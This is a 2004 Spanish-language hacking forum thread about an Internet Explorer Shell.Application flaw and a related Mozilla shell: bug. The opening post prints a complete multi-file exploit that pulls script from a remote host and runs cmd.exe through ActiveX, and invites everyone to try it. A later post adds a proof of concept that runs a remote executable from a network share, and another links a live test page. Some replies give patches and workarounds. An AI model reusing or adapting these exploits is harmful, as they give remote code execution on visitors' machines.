elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Cifrar documentos-carpetas con GnuPG en Linux y Windows


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  IExplorer Remote Application.Shell Exploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: IExplorer Remote Application.Shell Exploit  (Leído 2,347 veces)
TaU

Desconectado Desconectado

Mensajes: 184



Ver Perfil
IExplorer Remote Application.Shell Exploit
« en: 9 Julio 2004, 07:23 »

Agujero freskito freskito de nuestro kerido IExplorer:

Código:
-----------------------  installer.htm  -----------------------------
<html>
<body>

<script language="javascript">

function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;
dialogWidth:1\;").location="vbscript:\"<SCRIPT SRC='http://ip/shellscript_loader.js'><\/script>\"";
}

</script>

<script language="javascript">

setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" style=display:none;></IFRAME>');

</script>

</body>
</html>

------------------------- md.htm  -------------------------------
<SCRIPT language="javascript">

window.returnValue = window.dialogArguments;

function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}

CheckStatus();

</SCRIPT>

---------------------- shellscript_loader.js  -----------------------
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://ip/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

---------------------------- shellscript.js  ---------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language=
"JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);

-------------------------- redir.jsp  -------------------------------
<% Thread.sleep(1500);
response.setStatus(302);
response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm");
%>

fuente: k-otik
remedio: IEfix.reg

No lo he comprobado todavia, pero por lo que se comenta estos dias en FullDisclosure se basa en un fallo de seguridad que comparten la mayoria de los navegadores, incluido Mozilla/Firefox.

Ale, a probarlo todos...  ^_^

Salu2
« Última modificación: 9 Julio 2004, 07:34 por TaU » En línea

"Si no se vive como se piensa, se acabará pensando como se vive", Pep Figueres
Revolucionario / Presidente de Costa Rica / Primer jefe de estado de la historia en abolir el ejército / Catalán.
www.wadalbertia.org  -<|¡^P
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 19.347


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: IExplorer Remote Application.Shell Exploit
« Respuesta #1 en: 9 Julio 2004, 22:04 »

parece que ya está el parche:

*- Corregido fallo de seguridad en Mozilla para Windows
http://www.mozilla.org/security/shell.html

Y ha salido el Firefox 0.9.1 / 0.9.2 parcheados, claro está.

http://ftp.eu.mozilla.org/pub/mozilla.org/firefox/releases/0.9.2/FirefoxSetup-0.9.2.exe

http://ftp.eu.mozilla.org/pub/mozilla.org/firefox/releases/0.9.1/firefox-0.9.1-i686-linux-gtk2+xft-installer.tar.gz




Firefox 0.9.2 Win 32
http://ftp.eu.mozilla.org/pub/mozilla.org/firefox/releases/0.9.2/FirefoxSetup-0.9.2.exe
5 MB

Firefox 0.9.1 Linux
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/0.9.1/firefox-0.9.1-i686-linux-gtk2+xft-installer.tar.gz
8,3 MB


Mozilla 1.7.1 Win32
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.1/mozilla-win32-1.7.1-installer.exe
12 MB

Mozilla 1.7.1 Linux
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7/mozilla-i686-pc-linux-gnu-1.7-installer.tar.gz
14 MB

Thunderbird 0.7 Windows
http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/0.7.2/ThunderbirdSetup-0.7.2.exe
6 MB

Thunderbird 0.7.1 Linux
http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/0.7.1/thunderbird-0.7.1-i686-linux-gtk2+xft.tar.gz
9,7 MB
« Última modificación: 9 Julio 2004, 23:03 por el-brujo » En línea

Since 2001, still kicking hard
TaU

Desconectado Desconectado

Mensajes: 184



Ver Perfil
Re: IExplorer Remote Application.Shell Exploit
« Respuesta #2 en: 10 Julio 2004, 00:18 »

Pues empieza a ser MUY recomendable poner esos parches porque ya ha salido otro bug que se basa en el comando "shell":

MOZILLA: SHELL can execute remote EXE program

Código:
############################################################
[START] PROOF OF CONCEPT
############################################################
<!--
MOZILLA REMOTE COMPROMISE DEMO

REPLACE "[" WITH "<", and REPLACE "]" WITH ">".

!!!!! WARNING !!!!!
THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.

PROCESS:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
"X-6487ohu4s6x0p".
        THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER
AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER.

CREATED BY:
"Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME

COPYRIGHT:
This Demo is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
-->

[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

fuente

salu2
En línea

"Si no se vive como se piensa, se acabará pensando como se vive", Pep Figueres
Revolucionario / Presidente de Costa Rica / Primer jefe de estado de la historia en abolir el ejército / Catalán.
www.wadalbertia.org  -<|¡^P
viruss1362

Desconectado Desconectado

Mensajes: 204



Ver Perfil WWW
Re: IExplorer Remote Application.Shell Exploit
« Respuesta #3 en: 10 Julio 2004, 13:08 »

alguien lo ha provado? sirve para explorer no?
En línea

Más vale parecer un idiota con la boca cerrada, que abrir la boca y demostrar que lo eres

www.equipome.com
TaU

Desconectado Desconectado

Mensajes: 184



Ver Perfil
Re: IExplorer Remote Application.Shell Exploit
« Respuesta #4 en: 11 Julio 2004, 02:23 »

Para kien kiera comprobar si es vulnerable al primer exploit:

http://62.131.86.111/security/idiots/malware2k/installer.htm

Se os abrira momentáneamente el archivo tip.htm que se encuentra dentro del directorio de instalacion del windows en la carpeta web y luego se os abrirá una consola msdos con los parámetros: /c pause.

Autor de este PoC: Jelmer

No funciona en mozilla, pero SI va perfectamente en IExplorer con winXP y todos los parches.

Salu2
En línea

"Si no se vive como se piensa, se acabará pensando como se vive", Pep Figueres
Revolucionario / Presidente de Costa Rica / Primer jefe de estado de la historia en abolir el ejército / Catalán.
www.wadalbertia.org  -<|¡^P
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 19.347


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: IExplorer Remote Application.Shell Exploit
« Respuesta #5 en: 13 Julio 2004, 09:05 »

bueno seguimos con la "saga" de cyruxnet.org

Actualizado 10-07-2004
Publicado un parche para el registro que soluciona temporalmente el problema, no es oficial pero es efectivo:
http://www.securityfocus.com/archive/1/367872
Microsoft el 02-04-2004 publica su parche KB870669 pero parece ser no funciona correctamente, porque lo único que hace el parche es desactivar el ADODB.Stream
Liu Die Yu advirtió de que utilizando el mismo exploit pero con la aplicación Shell en lugar del ADODB.Stream
http://www.securityfocus.com/archive/1/367881
Un par de horas después jelmer sacó el nuevo exploit utilizando comando shell
http://www.securityfocus.com/archive/1/367878

Actualizado 12-07-2004
Variación del exploit de jelmer que, analizando el código se ponen de manifiesto las posibilidades de esta vulnerabilidad (es sólo una modificación simple, pero lo pongo porque seguro que a muchos os gusta)
http://sec.drorshalev.com/dev/ShellExecute/dror.zip
En línea

Since 2001, still kicking hard
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Introducción a los Web Application Firewalls (WAF)
Seguridad
madpitbull_99 4 5,138 Último mensaje 15 Julio 2011, 18:33
por Dr [F]
[VBS] IternetExplorer.Application
Scripting
klaine 8 2,402 Último mensaje 25 Julio 2011, 23:43
por klaine
Remote Shell (Masm32)
ASM
Vaagish 7 2,058 Último mensaje 15 Mayo 2014, 22:55
por cpu2
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines